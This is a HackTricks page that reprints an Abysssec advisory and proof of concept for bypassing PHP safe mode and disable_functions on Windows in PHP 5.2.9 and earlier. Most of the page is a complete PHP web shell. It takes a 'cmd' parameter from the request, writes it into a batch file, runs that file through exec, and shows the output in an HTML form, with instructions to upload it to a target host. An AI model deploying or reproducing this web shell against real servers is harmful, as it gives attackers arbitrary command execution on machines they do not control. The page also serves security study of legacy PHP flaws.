disable_functions bypass - PHP <= 5.2.9 on windows

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

PHP <= 5.2.9 on windows

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

<?php
//cmd.php
/*
	Abysssec Inc Public Advisory 
	
	Here is another safemod bypass vulnerability exist in php <= 5.2.9 on windows .
	the problem comes from OS behavior - implement  and interfacing between php
	and operation systems directory structure . the problem is php won't tell difference 
	between directory browsing in linux and windows this can lead attacker to ability 
	execute his / her commands on targert machie even in SafeMod On  (php.ini setting) . 
	=============================================================================
	in linux when you want open a directory for example php directory you need
	to go to /usr/bin/php and you can't use \usr\bin\php . but windows won't tell
	diffence between slash and back slash it means there is no didffrence  between 
	c:\php and c:/php , and this is not vulnerability but itself but  because of this  simple 
	php implement "\" character can escape safemode using  function like excec . 
	here is a PoC for discussed vulnerability . just upload files on your target host and execute
	your commands . 
	==============================================================================
	note : this vulnerabities is just for educational purpose and author will be not be responsible  
	for any damage using this vulnerabilty. 
	==============================================================================
	for more information visit Abysssec.com
	feel free to contact me at admin [at] abysssec.com
*/
	$cmd = $_REQUEST['cmd'];
	if ($cmd){
	$batch = fopen ("cmd.bat","w");
	fwrite($batch,"$cmd>abysssec.txt"."\r\n");
	fwrite($batch,"exit");
	fclose($batch);
	exec("\start cmd.bat");
	echo "<center>";
	echo "<h1>Abysssec.com PHP <= 5.2.9 SafeMod Bypasser</h1>";
	echo "<textarea rows=20 cols=60>";
	require("abysssec.txt");
	echo "</textarea>";
	echo "</center>";
	}
?>

<html>
<body bgcolor=#000000 and text=#DO0000>
<center>
<form method=post>
<input type=text name=cmd >
<input type=submit value=bypass>
</form>
</center>
</body>
</html>

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Last updated